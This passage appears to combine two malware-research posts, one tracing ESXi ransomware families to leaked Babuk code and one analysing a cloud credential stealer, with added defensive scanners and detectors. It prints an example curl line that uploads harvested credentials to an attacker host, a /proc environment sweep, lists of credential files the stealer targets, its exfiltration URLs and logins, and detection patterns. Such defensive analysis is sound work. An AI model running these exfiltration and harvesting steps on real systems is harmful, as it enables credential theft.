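The string-based identification described above can be turned into a simple triage scanner. The following is an added example, not SentinelLabs’ tooling: it looks for the main.cpp log string (written with an ASCII apostrophe, as the C++ source would contain it), the builder’s default output name, the default ransom note names mentioned on this page, and the unstripped file-walker symbol, and only calls a blob Babuk-like when it is an ELF that carries the log string. The sample blobs are constructed, not real samples.

```python
from dataclasses import dataclass, field

ELF_MAGIC = b"\x7fELF"

# Markers taken from the report. The log string uses an ASCII apostrophe as in C++ source.
BABUK_MARKERS = {
    "log_string": b"Doesn't encrypted files: %d",
    "builder_output_name": b"e_esxi.out",
    "note_name_babuk_mario": b"How To Restore Your Files.txt",
    "note_name_xvgv": b"HowToRestore.txt",
    "walker_symbol": b"find_files_recursive",   # survives only in unstripped builds
}


@dataclass
class ScanResult:
    is_elf: bool
    hits: dict = field(default_factory=dict)   # marker name -> first offset in the blob

    def babuk_like(self) -> bool:
        """Conservative verdict: an ELF carrying the unique main.cpp log string."""
        return self.is_elf and "log_string" in self.hits


def scan_babuk_markers(data: bytes) -> ScanResult:
    """Record the first offset of every known marker found in the blob."""
    result = ScanResult(is_elf=data.startswith(ELF_MAGIC))
    for name, needle in BABUK_MARKERS.items():
        offset = data.find(needle)
        if offset != -1:
            result.hits[name] = offset
    return result


def scan_file(path: str) -> ScanResult:
    """Scan a file on disk; intended for suspicious ELF binaries on ESXi or Linux hosts."""
    with open(path, "rb") as fh:
        return scan_babuk_markers(fh.read())


# Constructed blobs standing in for a Babuk-descended ELF and an unrelated ELF (not real samples).
# A real ELF header is 64 bytes; only the magic matters to the scanner.
SAMPLE_DESCENDANT = (
    ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 61
    + b"How To Restore Your Files.txt\x00"
    + b"Doesn't encrypted files: %d\n\x00"
    + b"find_files_recursive\x00"
)
SAMPLE_UNRELATED = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 61 + b"Usage: %s [options]\x00"

if __name__ == "__main__":
    r = scan_babuk_markers(SAMPLE_DESCENDANT)
    print("babuk-like:", r.babuk_like(), "markers:", sorted(r.hits))
```

Because the verdict hinges on one literal, a descendant whose author rewrote that log line would be missed; the other markers are there to keep pulling on weaker threads (note names, the builder’s output name) that the report shows families like Mario and XVGV did not change.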

For encryption, ESXi Babuk uses an implementation of the Sosemanuk stream cipher to encrypt targeted files, in contrast with Babuk for Windows, which uses the HC-128 cipher. Both ESXi and Windows Babuk use Curve25519-Donna to generate the encryption key.
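Curve25519-Donna is an implementation of X25519 (RFC 7748). For a responder the relevant consequence of a binary generating its encryption key this way is that the binary need only carry a public key: in such a scheme a fresh private scalar is drawn for the run and discarded, so the shared secret that seeds the file cipher can be recomputed only with the matching private key, which is never on the victim host. The following pure-Python X25519 is an added example, not Babuk’s code or the Donna library, and the Sosemanuk keying itself is out of scope; it checks itself against the RFC 7748 section 6.1 vectors and demonstrates the per-run agreement.

```python
import os

P = 2**255 - 19
A24 = 121665
BASEPOINT = (9).to_bytes(32, "little")


def _clamp(k: bytes) -> int:
    """Decode a 32-byte scalar with the RFC 7748 clamping bits applied."""
    kb = bytearray(k)
    kb[0] &= 248
    kb[31] &= 127
    kb[31] |= 64
    return int.from_bytes(kb, "little")


def _decode_u(u: bytes) -> int:
    """Decode a 32-byte little-endian u-coordinate, ignoring the unused top bit."""
    ub = bytearray(u)
    ub[31] &= 127
    return int.from_bytes(ub, "little")


def x25519(k: bytes, u: bytes) -> bytes:
    """k * u on Curve25519 via the Montgomery ladder of RFC 7748 section 5.
    Educational code: Python big integers are not constant-time."""
    k_int = _clamp(k)
    x1 = _decode_u(u)
    x2, z2, x3, z3 = 1, 0, x1, 1
    swap = 0
    for t in range(254, -1, -1):
        k_t = (k_int >> t) & 1
        swap ^= k_t
        if swap:
            x2, x3 = x3, x2
            z2, z3 = z3, z2
        swap = k_t
        a = (x2 + z2) % P
        aa = a * a % P
        b = (x2 - z2) % P
        bb = b * b % P
        e = (aa - bb) % P
        c = (x3 + z3) % P
        d = (x3 - z3) % P
        da = d * a % P
        cb = c * b % P
        x3 = (da + cb) * (da + cb) % P
        z3 = x1 * ((da - cb) * (da - cb)) % P
        x2 = aa * bb % P
        z2 = e * (aa + A24 * e) % P
    if swap:
        x2, x3 = x3, x2
        z2, z3 = z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")


def public_key(priv: bytes) -> bytes:
    return x25519(priv, BASEPOINT)


def shared_secret(own_priv: bytes, peer_pub: bytes) -> bytes:
    return x25519(own_priv, peer_pub)


def ephemeral_agreement(static_pub: bytes):
    """One run of the hybrid pattern: a fresh scalar, its public half (which would be stored
    alongside the ciphertext), and the shared secret that would seed the file cipher.
    Only the holder of the static private key can recompute the secret from run_pub."""
    run_priv = os.urandom(32)
    run_pub = public_key(run_priv)
    return run_pub, shared_secret(run_priv, static_pub)


# RFC 7748 section 6.1 test vectors
_A = bytes.fromhex("77076d0a7318a57d3c16c17251b26645df4c2f87ebc0992ab177fba51db92c2a")
_B = bytes.fromhex("5dab087e624a8a4b79e17f8b83800ee66f3bb1292618b6fd1c2f8b27ff88e0eb")
_A_PUB = "8520f0098930a754748b7ddcb43ef75a0dbf3a0d26381af4eba4a98eaa9b4e6a"
_B_PUB = "de9edb7d7b7dc1b4d35b61c2ece435373f8343c85b78674dadfc7e146f882b4f"
_K = "4a5d9d5ba4ce2de1728e3bf480350f25e07e21c947d19e3376f09b3c1e161742"


def rfc7748_selfcheck() -> bool:
    """True when both public keys and the shared secret match the RFC vectors."""
    return (public_key(_A).hex() == _A_PUB and public_key(_B).hex() == _B_PUB
            and shared_secret(_A, public_key(_B)).hex() == _K
            and shared_secret(_B, public_key(_A)).hex() == _K)


if __name__ == "__main__":
    print("RFC 7748 vectors:", rfc7748_selfcheck())
```

The practical reading for incident response: recovering the 32-byte public key from a sample (as the IceFire report does with its embedded RSA key) identifies the operator’s key but does not help decrypt, because the file keys depend on a scalar that existed only in process memory during the run.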

Generations of Babuk

Comparison Methodology

SentinelLabs compiled an unstripped Babuk binary to establish a baseline of how Babuk looks and behaves, referred to henceforth as ‘Baseline Babuk.’ To understand whether the variants we identified are related to Babuk, we compared each variant to this Baseline Babuk sample and highlighted notable similarities and differences.

Babuk 2023 (.XVGV)

SHA1: e8bb26f62983055cfb602aa39a89998e8f512466

XVGV, aka Babuk 2023, emerged in March 2023 on Bleeping Computer’s forum as highlighted by @malwrhunterteam. Baseline Babuk and XVGV share code derived from main.cpp, argument processing functions from args.cpp, and encryption implementation.

Like Babuk, XVGV requires the operator to provide a directory to encrypt as an argument. During dynamic analysis, we provided the test system’s user directory. On the first run, the sample generated a ransom note, HowToRestore.txt, in all child directories.

However, only six files were encrypted, each with either .log or .gz file extensions. Looking at the file extension inclusions reveals why the damage was limited: XVGV targets VMware-centric files and excludes those which do not match a designated list. This is a behavior shared with Baseline Babuk, though the XVGV author added more file extensions.

XVGV .rodata segment references to file extensions (left) and Babuk source code equivalent

Play (.FinDom)

SHA1: dc8b9bc46f1d23779d3835f2b3648c21f4cf6151

This file references the file extension .FinDom, as well as the ransom email address [email protected], which are artifacts associated with Play Ransomware. This is the first known version of Play built for a Linux system, which aligns this actor with the trend of ransomware groups increasingly targeting Linux. Play contains the same file searching functionality as Baseline Babuk; it also implements encryption using Sosemanuk.

Baseline Babuk (left) and Play disassembly of a ransom note construction function.

The Play binary was submitted to VirusTotal as part of an archive (SHA1: 9290478cda302b9535702af3a1dada25818ad9ce) containing various hack tools and utilities–including AnyDesk, NetCat, a privilege escalation batch file, and encoded PowerShell Empire scripts–which are associated with ransomware group techniques after achieving initial access.

Mario (.emario)

SHA1: 048b3942c715c6bff15c94cdc0bb4414dbab9e07

Mario ransomware is operated by Ransom House, a group that emerged in 2021. Ransom House initially claimed that they target vulnerable networks to steal data without encrypting files. However, the group has since adopted cryptographic lockers.

The samples share a very similar find_files_recursive function, including the default ransom note filename How To Restore Your Files.txt. The encryption functions are also the same.

The verbose ransom note content is the most unique part of Mario’s ESXi locker. The Ransom House actors provide very explicit instructions to the victim explaining what to do and how to contact the actors.

Mario strings show default Babuk logging messages and the ransom note

Conti POC (.conti)

Conti POC – SHA1: 091f4bddea8bf443bc8703730f15b21f7ccf00e9
Conti ESXi Locker – SHA1: ee827023780964574f28c6ba333d800b73eae5c4

To our surprise, the Babuk hunt identified several binaries internally called ‘Conti POC,’ likely short for ‘proof of concept,’ which were documented in a September 2022 campaign against entities in Mexico.

Conti was a notoriously well-organized and ruthless ransomware group. Leaks revealed Conti’s organizational structure resembles many legitimate companies more than a criminal enterprise: the operation employed middle management and a human resources department. Chat history leaks circa early 2021 revealed that Conti had trouble getting their ESXi locker to work.

We compared several iterations of Conti and Babuk to assess a connection. Conti ESXi emerged in April 2022, which could mean that Conti implemented Babuk code after it was leaked in September 2021 and ultimately got the locker to work.

  • Conti POC & Conti ESXi Locker: The Conti POC is less mature, which aligns with being a ‘proof of concept.’ Conti POC and Conti ESXi share many function names and behaviors, including the same argument processing functions and conditions. We conclude these samples are related, and that Conti POC is a likely predecessor to Conti’s ESXi locker.

    Side-by-side view of Conti ESXi (left) and the Conti POC Babuk descendant argument processing

  • Conti POC & Baseline Babuk: The Conti POC SearchFiles and Baseline Babuk find_files_recursive functions are remarkably similar, containing the same file status variable names. Conti ported certain parts of this function to other local modules, demonstrating more maturity than Baseline Babuk. These two also share a similar main function, suggesting these families are also related and that Conti POC is a more mature evolution of Baseline Babuk.

    find_files_recursive in Baseline Babuk (left) and SearchFiles in Conti POC

  • Comparing to Conti Leaked Windows Code: There are considerable overlaps in utility as well as function names between both Linux versions of Conti (POC and ESXi) and the leaked Windows Conti code. Both versions use the same open-source ChaCha encryption implementation. The leaked Conti Windows code contains commented-out references to HandleCommandLine, a function seen in the other Conti variants we analyzed, and several shared arguments to parse, such as prockiller. It is possible that a developer aligned function names between the Windows version and the ESXi locker in aspiration of feature parity.

    Conti ESXi (left) and Windows main.cpp HandleCommandLine function

REvil aka Revix (.rhkrc)

RHKRC – SHA1: 74e4b2f7abf9dbd376372c9b05b26b02c2872e4b
Revix June 2021 – SHA1: 29f16c046a344e0d0adfea80d5d7958d6b6b8cfa

We identified a Babuk-like sample internally called RHKRC, which appends the .rhkrc extension to filenames, a behavior associated with the REvil group’s “Revix” ESXi locker. Interestingly, reports of Revix in-the-wild date back to June 2021, which predates the September 2021 Babuk source code leaks.

To understand where this fits in the development timeline, we compared several iterations of related activity:

  • RHKRC & Conti POC: Surprisingly similar, these versions both implement encryption identically through ChaCha20 as outlined above. They share a nearly identical, otherwise unique InitializeEncryptor function. These samples are related.
    InitializeEncryptor functions from RHKRC (left) and Conti POC

    EncryptFull functions from RHKRC (left) and Conti POC

  • RHKRC & Baseline Babuk: These samples share many function names, including Babuk’s native thread pooling. However, RHKRC implements encryption differently, and it has more bespoke ESXi CLI activity. We assess that these samples are related, though RHKRC is more mature despite also being in the ‘proof of concept’ stage.
  • RHKRC & June 2021 Revix: We compared RHKRC with Revix from June 2021 in-the-wild activity. Revix is much more mature and contains dynamic code deobfuscation measures unseen in other variants analyzed. RHKRC and Revix share the same internal filename (elf.exe), ransom note name, and appended file extension. However, these similarities are mainly cosmetic, and we are unable to conclude whether a definitive connection exists. Any theories about these coincidences amount to conjecture.

Honorable Mention

SentinelLabs notes there are several other known families descended from the Babuk ESXi source code, including:

While there are undoubtedly more Babuk offspring that slipped under the radar, there are other unique ESXi ransomware families. A cursory glance at ALPHV, BlackBasta, Hive, and Lockbit’s ESXi lockers shows no obvious similarity to Babuk.

Babuk is occasionally blamed in error, too. Reports on the February ESXiArgs campaign–which briefly devastated some unpatched cloud services–claim the eponymous locker is derived from Babuk. However, our analysis found little similarity between ESXiArgs (SHA1: f25846f8cda8b0460e1db02ba6d3836ad3721f62) and Babuk. The only noteworthy similarity is the use of the same open-source Sosemanuk encryption implementation. The main function is entirely different, as shown below. ESXiArgs also uses an external shell script to search files and provide arguments to the esxcli, so there is no native find_files_recursive function to compare.

ESXiArgs main function

Conclusion

SentinelLabs’ analysis identified unexpected connections between ESXi ransomware families, exposing likely relationships between Babuk and more illustrious operations like Conti and REvil. While ties to REvil remain tentative, the possibility exists that these groups–Babuk, Conti, and REvil–potentially outsourced an ESXi locker project to the same developer. The talent pool for Linux malware developers is surely much smaller in ransomware development circles, which have historically held demonstrable expertise in crafting elegant Windows malware. Ransomware groups have experienced numerous leaks, so it is plausible smaller leaks occurred within these circles. Additionally, actors may share code to collaborate, similar to open-sourcing a development project.

There is a noticeable trend that actors increasingly use the Babuk builder to develop ESXi and Linux ransomware. This is particularly evident when used by actors with fewer resources, as these actors are less likely to significantly modify the Babuk source code.

Based on the popularity of Babuk’s ESXi locker code, actors may also turn to the group’s Go-based NAS locker. Golang remains a niche choice for many actors, but it continues to increase in popularity. The targeted NAS systems are also based on Linux. While the NAS locker is less complex, the code is clear and legible, which could make ransomware more accessible for developers who are familiar with Go or similar programming languages.

Indicators of Compromise

Ransomware Family SHA1
Baseline Babuk (.babyk) b93d649e73c21efea10d4d811b711316206c0509
Babuk Leaks Binary – d_esxi.out cd19c2741261de97e91943148ba8c0863567b461
Babuk Leaks Binary – e_esxi.out 885a734c7869b52aa125674cb430199b2645cda0
Babuk 2023 (.XVGV) e8bb26f62983055cfb602aa39a89998e8f512466
Play ESXi (.FinDom) dc8b9bc46f1d23779d3835f2b3648c21f4cf6151
Play ESXi Compressed Parent 9290478cda302b9535702af3a1dada25818ad9ce
Rorschach aka Bablock (.slpqne) 76fb0d08fd5b9c52cb9da118ce5561cc0462555f
Mario (.emario) 048b3942c715c6bff15c94cdc0bb4414dbab9e07
Conti POC (.conti) 091f4bddea8bf443bc8703730f15b21f7ccf00e9
Conti ESXi (.conti) ee827023780964574f28c6ba333d800b73eae5c4
RHKRC (.rhkrc) 74e4b2f7abf9dbd376372c9b05b26b02c2872e4b
RHKRC (.rhkrc) 29f16c046a344e0d0adfea80d5d7958d6b6b8cfa
Cylance Ransomware (.cylance) 933ad0a7d9db57b92144840d838f7b10356c7e51
Dataf Locker (.dataf) 71ed640ebd8377f52bda4968398c62c97ae1c3ed
Lock4 Ransomware (.lock4) 3b1a2847e006007626ced901e402f1a33bb800c7

Cloudy With a Chance of Credentials | AWS-Targeting Cred Stealer Expands to Azure, GCP

13 July 2023 at 12:55

By Alex Delamotte, with Ian Ahl (Permiso) and Daniel Bohannon (Permiso)

Executive Summary

  • Throughout June 2023, an actor behind a cloud credentials stealing campaign has expanded their tooling to target Azure and Google Cloud Platform (GCP) services. Previously, this actor focused exclusively on Amazon Web Services (AWS) credentials.
  • Cloud service credentials are increasingly targeted as actors find more ways to profit from compromising such services. This actor targeted exposed Docker instances to deploy a worm-like propagation module.
  • These campaigns share similarity with tools attributed to the notorious TeamTNT cryptojacking crew. However, attribution remains challenging with script-based tools, as anyone can adapt the code for their own use.

Background

In December 2022, the threat research team at Permiso Security reported on a cloud credential stealer campaign that primarily targeted Amazon Web Services (AWS) credentials from public-facing Jupyter Notebook services. The actors likely accessed these impacted services through unpatched web application vulnerabilities.

From June 14, 2023 through the end of the month, we worked with the Permiso team to track and analyze files related to a new incarnation of this campaign targeting exposed Docker services. The hallmark shell scripts remain the core of these campaigns, though we also identified an Executable and Linkable Format (ELF) binary written in Golang. The research team at Aqua also recently reported elements they observed from these actors’ abuse of Docker images.

SentinelLabs thanks the Permiso Security research team for their collaboration on the research in this report. The Permiso team released a blog about this campaign, which can be found here.

Tooling Updates

Since the December campaign, the actor has made several updates to how their tooling works.

Script Functionality

The December campaign targeted AWS credentials; the most recent campaigns added functions that target credentials from Azure and GCP. The actor actively modified these features as the campaigns evolved throughout June: initially, a script aws.sh contained references to Azure credentials, but the relevant function was not called. A week later, samples emerged where the Azure credential functions were called.

The actor stored the generic credentials in an array labeled CRED_FILE_NAMES. The AWS-specific array from the original script ACF has been replaced with AWS_CREDS_FILES. We dive into this in more detail in the next section. There are also two new cloud service provider (CSP)-specific credentials variables: GCLOUD_CREDS_FILES and AZURE_CREDS_FILES.

The actor made the script more modular as it grew larger and more complex. The AWS functionality is now split into three smaller functions that are driven by the run_aws_grabber function only if the system is identified as AWS. This increases the efficiency of the script by running AWS commands only on AWS systems, which also enhances the script’s stealth.

Infrastructure

The actor no longer hosts files in an open directory, which complicates efforts to track and analyze these campaigns. Instead, C2 activity relies on a hardcoded username and password combination that are passed as arguments to the curl command.

The older campaign infrastructure was hosted on a Netherlands-based IP associated with Nice IT Services. The attacker has since moved infrastructure to AnonDNS, a dynamic domain name service (DDNS) provider. The campaigns through June 2023 use one of several AnonDNS subdomains:

everlost.anondns.net
silentbob.anondns.net
ap-northeast-1.compute.internal.anondns.net

Credentials Collection

The newer versions target credentials in newly added arrays GCLOUD_CREDS_FILES and AZURE_CREDS_FILES. The versions emerging the week of 6/26/2023 added .env and docker-compose.yaml; the version from 6/15/2023 has env without the period, so the actor is apparently updating the tool to be more effective in the newest campaign. The newest campaign also has a new variable, MIXED_CREDFILES which contains only redis.conf.

The newer versions omitted the following credentials files that were present in the December campaign’s ACF:

cloud
.npmrc
credentials.gpg

The credentials collection logic in the new campaign’s samples targets the following services & technologies:

Technology Targeted File
Amazon Web Services .boto, .passwd-s3fs, .s3b_config, .s3backer_passwd, .s3cfg, credentials, s3proxy.conf
Azure azure.json
Google Cloud Platform .feature_flags_config.yaml, .last_opt_in_prompt.yaml, .last_survey_prompt.yaml, .last_update_check.json, access_tokens.db, active_config, adc.json, config_default, config_sentinel, credentials.db, gce
Censys censys.cfg
Docker docker-compose.yaml
Filezilla filezilla.xml, recentservers.xml, queue.sqlite3
Git .git-credentials
Grafana grafana.ini
Kubernetes clusters.conf, kubeconfig, secrets
Linux OS .netrc, netrc
Ngrok ngrok.yml
PostgresQL .pgpass, postgresUser.txt, postgresPassword.txt
Redis redis.conf
S3QL authinfo2
Server Message Block (SMB) .smbclient.conf, .smbcredentials, .samba_credentials
Uncategorized .env, accounts.xml, api_key, resource.cache, servlist.conf

There is considerable overlap in the targeted files between these credential stealer campaigns and the TeamTNT Kubelet-targeting campaign reported by Sysdig in October 2022.

Arrays containing targeted credential file names in grab.sh

The script uses the cred_files function to search for credentials files on the system, write them to a temporary file $EDIS, copy the new file to a master credential-holding file $CSOF, then delete the temporary file. The $EDIS and $CSOF variable file names and paths are randomly generated via the special use Bash variable $RANDOM, meaning the value is an integer between 0 and 32767 that changes each time $RANDOM is accessed.

The cred_files function in aws.sh

AWS

The new scripts show more attention to making the features modular, a natural evolution as a script becomes more complex. The AWS-specific functionality is driven by a function named run_aws_grabber. Most AWS-centric features from the December campaign have been rolled into one of four functions driven by run_aws_grabber:

  • get_aws_infos: Queries the AWS instance metadata service (IMDS) for IAM configuration and sets the output to $AWS_INFO, as well as security credential configuration from EC2 and IAM resources, which are set to $AWS_1_EC2 and $AWS_1_IAM_NAME, respectively.
  • get_aws_meta: Writes the values from each of the variables generated in get_aws_infos then parses the data for specific values via grep and extracts them using sed, writing the output to the $CSOF variable.
  • get_aws_env: Checks for values in AWS credential related variables, writes them to $CSOF when present. When the $AWS_CONTAINER_CREDENTIALS_RELATIVE_URI is found, the function calls curl against the URL, then modifies the response using sed to format specific values into an aws configure set command. For example, the string AccessKeyId in the response is transformed to aws configure set aws_access_key_id. The actor likely chose to format the values as a command so that the output feeds into additional automated actions.
The get_aws_env function in aws.sh
  • get_awscli_data: This function is only implemented in the two most recent versions: the function exists in the 6/15/2023 version of aws.sh, but it is not called. The function invokes aws sts get-caller-identity to collect the 12-digit AWS account identifier and writes the result to $CSOF.

Azure & GCP

A notable recent addition is logic specific to the Azure and Google Cloud platforms. The get_azure and get_google functions are implemented in the newest versions seen on 06/26/2023; the logic was present in the 6/15 campaign, but the functions were not called. These changes indicate that these features are being actively developed, so we expect more changes as the actors roll out and test these features.

Newly implemented get_azure function in g.aws.sh

System Profiling

The attackers now perform system profiling through the aws.sh scripts as well as other scripts delivered under certain conditions. Another new feature is the get_docker function, which checks if the environment is a Docker container. When it is, the function runs docker inspect against each running container and saves the result to $CSOF. The output will not necessarily have credentials and this likely serves as a mechanism for system profiling.

Additionally, the new version added the function get_prov_vars, which calls cat /proc/*/env* to collect environment variable details from each running process and writes the result to $CSOF. The actor likely does this to enumerate other valuable services running on the system for manual targeting.
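The credential-file array names (Script Functionality section), the $RANDOM-derived temporary files of cred_files, the cat /proc/*/env* sweep of get_prov_vars, and the curl upload with a hardcoded username and password (Infrastructure section) together give a defender a workable static signature for triaging suspicious shell scripts. The Python below is an added example written for this page, not code from the report or from the actor's scripts: the scanned script text is a constructed stand-in that reuses only the variable names, the 1234/5678 credentials and the silentbob.anondns.net host listed in this report, the rule names are ours, and the three-independent-rules threshold is an assumption.

```python
"""Static triage of a shell script for the credential-stealer indicators
described in this report.

Added example, not code from the report or from the actor's scripts. The
script text below is CONSTRUCTED from the variable names, temp-file
pattern, /proc sweep and authenticated-curl upload the report describes;
it collects nothing and is not the real aws.sh.
"""
import re

# Constructed stand-in with one line per behaviour the rules look for.
SAMPLE_SCRIPT = """#!/bin/bash
CRED_FILE_NAMES=(".git-credentials" ".netrc" "kubeconfig")
AWS_CREDS_FILES=(".s3cfg" ".passwd-s3fs" "credentials")
GCLOUD_CREDS_FILES=("adc.json" "credentials.db")
AZURE_CREDS_FILES=("azure.json")
MIXED_CREDFILES=("redis.conf")
EDIS=/tmp/.$RANDOM
CSOF=/tmp/.$RANDOM$RANDOM
get_prov_vars() { cat /proc/*/env* >> $CSOF 2>/dev/null; }
send_data() { curl -s -u 1234:5678 -F "file=@$CSOF" http://silentbob.anondns.net/insert/keys.php; }
"""

# Constructed benign script: also uses $RANDOM and curl, but nothing else,
# so it must stay below the alert threshold.
BENIGN_SCRIPT = """#!/bin/bash
TMP=/tmp/build.$RANDOM
curl -s https://example.com/release.tar.gz -o "$TMP"
"""

# Rule names are ours; each pattern encodes one behaviour from the report.
RULES = {
    "csp_cred_array": re.compile(
        r"^\s*(CRED_FILE_NAMES|AWS_CREDS_FILES|GCLOUD_CREDS_FILES|"
        r"AZURE_CREDS_FILES|MIXED_CREDFILES)=\("),
    "random_tmpfile": re.compile(r"^\s*\w+=\S*\$RANDOM"),
    "proc_environ_sweep": re.compile(r"\bcat\s+/proc/\*/env\*"),
    "curl_basic_auth_anondns": re.compile(
        r"\bcurl\b.*\s(?:-u|--user)\s+\S+:\S+.*\banondns\.net\b"),
}

# Pulls the hardcoded upload credentials and URL so they can be handled as IoCs.
EXFIL_RX = re.compile(
    r"\bcurl\b.*\s(?:-u|--user)\s+(?P<user>[^:\s]+):(?P<pw>\S+)"
    r".*?(?P<url>https?://[^\s;\"']+)")


def scan_script(text):
    """Return {rule_name: [line numbers]} for every rule that fires."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def is_suspicious(hits, min_rules=3):
    """Require several independent behaviours so $RANDOM alone never alerts."""
    return len(hits) >= min_rules


def extract_exfil_credentials(text):
    """Return (username, password, url) for each hardcoded curl upload."""
    creds = []
    for line in text.splitlines():
        m = EXFIL_RX.search(line)
        if m:
            creds.append((m.group("user"), m.group("pw"), m.group("url")))
    return creds


if __name__ == "__main__":
    for label, script in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        hits = scan_script(script)
        print(label, hits, "SUSPICIOUS" if is_suspicious(hits) else "clean")
    print(extract_exfil_credentials(SAMPLE_SCRIPT))
```

The rules are deliberately narrow (exact array names, the literal /proc/*/env* glob, basic-auth curl to an anondns.net host) so they fit a YARA or SIEM port directly; the threshold exists because $RANDOM temp files and curl are common in legitimate scripts.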

We also observed profiling activity from Data.sh, a post-exploitation script that collects details from the system and sends it to the attacker’s server. The script uses Bash to craft a web request to download the curl binary from the attacker’s server through the bashload function. This is notable because attacks against minimal systems–such as containers–can be limited by the absence of ubiquitous binaries like curl.

The bashload function in Data.sh

The attacker sets variables for a lockfile and datafile in /var/tmp. The result of the following reconnaissance commands is written to the datafile:

whoami Current user
ls -al Lists all files in the current directory
who List of users with active terminal sessions
lastlog Log of user login history
cat /var/spool/cron/* Contents of configured cron jobs
ps aux Details about all running processes
netstat -anop Network connection and socket details
docker ps List of Docker containers, including stopped containers

The script then sends the results collected in the datafile to the C2 using curl with a provided username and password.
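One way to catch the Data.sh reconnaissance burst in process-execution telemetry is to count how many distinct commands from the table above a single parent process runs inside a short window; individually each command is routine, the combination within seconds is not. The Python below is an added example, not code from the report: the `timestamp ppid= pid= user= cmd=` log shape and the sample lines are constructed stand-ins for whatever execve telemetry a site collects, and the five-distinct-commands-in-sixty-seconds threshold is an assumption to be tuned against local administrator behaviour.

```python
"""Detect the burst of host-reconnaissance commands Data.sh runs.

Added example, not code from the report. The log lines are CONSTRUCTED in
a simple `timestamp ppid=.. pid=.. user=.. cmd=..` shape standing in for
real process-execution telemetry (auditd execve records, EDR events).
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One matcher per command in the report's Data.sh table.
RECON_COMMANDS = {
    "whoami": re.compile(r"^whoami\b"),
    "ls_all": re.compile(r"^ls\s+-al\b"),
    "who": re.compile(r"^who\b"),
    "lastlog": re.compile(r"^lastlog\b"),
    "cron_spool": re.compile(r"^cat\s+/var/spool/cron/"),
    "ps_aux": re.compile(r"^ps\s+aux\b"),
    "netstat_anop": re.compile(r"^netstat\s+-anop\b"),
    "docker_ps": re.compile(r"^docker\s+ps\b"),
}

LOG_RX = re.compile(
    r"^(?P<ts>\S+) ppid=(?P<ppid>\d+) pid=\d+ user=(?P<user>\S+) cmd=(?P<cmd>.*)$")

# Constructed telemetry: a scripted burst under ppid 4242 (ten seconds), and
# an administrator under ppid 900 running two of the same commands an hour
# apart, which must not alert.
SAMPLE_LOG = """\
2023-06-20T10:00:00 ppid=4242 pid=4301 user=root cmd=whoami
2023-06-20T10:00:01 ppid=4242 pid=4302 user=root cmd=ls -al
2023-06-20T10:00:01 ppid=4242 pid=4303 user=root cmd=who
2023-06-20T10:00:02 ppid=4242 pid=4304 user=root cmd=lastlog
2023-06-20T10:00:03 ppid=4242 pid=4305 user=root cmd=cat /var/spool/cron/root
2023-06-20T10:00:04 ppid=4242 pid=4306 user=root cmd=ps aux
2023-06-20T10:00:05 ppid=4242 pid=4307 user=root cmd=netstat -anop
2023-06-20T10:00:09 ppid=4242 pid=4308 user=root cmd=docker ps
2023-06-20T11:00:00 ppid=900 pid=1201 user=admin cmd=ps aux
2023-06-20T12:00:00 ppid=900 pid=1450 user=admin cmd=docker ps
"""


def classify(cmd):
    """Map a command line to a reconnaissance category, or None."""
    for name, rx in RECON_COMMANDS.items():
        if rx.match(cmd):
            return name
    return None


def parse_events(text):
    """Return (timestamp, ppid, user, category) for recon commands only."""
    events = []
    for line in text.splitlines():
        m = LOG_RX.match(line)
        if not m:
            continue
        category = classify(m.group("cmd"))
        if category:
            events.append((datetime.fromisoformat(m.group("ts")),
                           m.group("ppid"), m.group("user"), category))
    return events


def detect_recon_bursts(text, min_distinct=5, window_seconds=60):
    """Alert once per parent process that runs >= min_distinct distinct
    reconnaissance commands within window_seconds of each other."""
    window = timedelta(seconds=window_seconds)
    by_parent = defaultdict(list)
    for ts, ppid, user, cat in parse_events(text):
        by_parent[ppid].append((ts, user, cat))
    alerts = []
    for ppid, evs in by_parent.items():
        evs.sort()
        for i, (start, user, _) in enumerate(evs):
            seen = {cat for ts, _, cat in evs[i:] if ts - start <= window}
            if len(seen) >= min_distinct:
                alerts.append({"ppid": ppid, "user": user,
                               "start": start.isoformat(), "commands": sorted(seen)})
                break  # one alert per parent is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_recon_bursts(SAMPLE_LOG):
        print(alert)
```

Grouping by parent PID rather than by user is what separates a script like Data.sh from an administrator who happens to run the same tools during a shift; widening the window or lowering the threshold in the test below shows how quickly the admin session starts to alert.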

Credentials Exfiltration

After collecting and processing the credentials, the credentials stealing scripts use curl to exfiltrate the contents of the $CSOF file to an AnonDNS-hosted server. The script contains hardcoded credentials that are used to authenticate the request. The June 2023 campaigns use the following username, password, and server URL combinations:

SHA1 5611cb5676556410981eefab70d0e2aced01dbc5
Name aws.sh
Username jegjrlgjhdsgjh
Password oeireopüigreigroei
Exfil URL http[:]//everlost.anondns.net/upload.php

SHA1 61da5d358df2e99ee174b22c4899dbbf903c76f0
Name aws.sh (newer)
Username 1234
Password 5678
Exfil URL http[:]//silentbob.anondns.net/insert/keys.php

SHA1 ac78d5c763e460db2137999b67b921e471a55e11
Name g.aws.sh
Username 1234
Password 5678
Exfil URL http[:]//ap-northeast-1.compute.internal.anondns.net/insert/keys.php

SHA1 dba0dcb8378d84abc8f7bf897825dd4f23e20e04
Name data.sh
Username 8765
Password 4321
Exfil URL http[:]//everlost.anondns.net/data.php

The send_data function from g.aws.sh

Propagation

In addition to the usual shell scripts, we observed the actor delivering a UPX-packed, Golang-based ELF binary. The binary ultimately drops and executes another shell script that scans an actor-specified range and attempts to propagate to vulnerable targets. We believe the reason the actor used this binary to deliver yet another script is due to the relatively noisy nature of the scanning activity. The scanner is hidden as an embedded base64 object within the packed Golang binary, adding more stealth than a standalone shell script. Additionally, the binary drops Zgrab–a Golang network scanning tool–which depends on Golang environment variables that are set by running the parent Go binary.

The implemented code enables the binary to read a command from a string and execute it using os_exec.

The main_main function

The main_main function decodes an embedded base64 blob, resulting in a Bash script that is written and then executed by the main_runCommand function. In the embedded script, the setupsomething function downloads the following packages on systems using the Yum package manager:

  • Compiler and code processing: gcc make git jq
  • Network utilities: libpcap libpcap-devel curl

This function also downloads the following packages on systems that use the Apt package manager:

  • Compiler and code processing: gcc make git jq
  • Network utilities: libpcap0.8 libpcap0.8-dev masscan curl

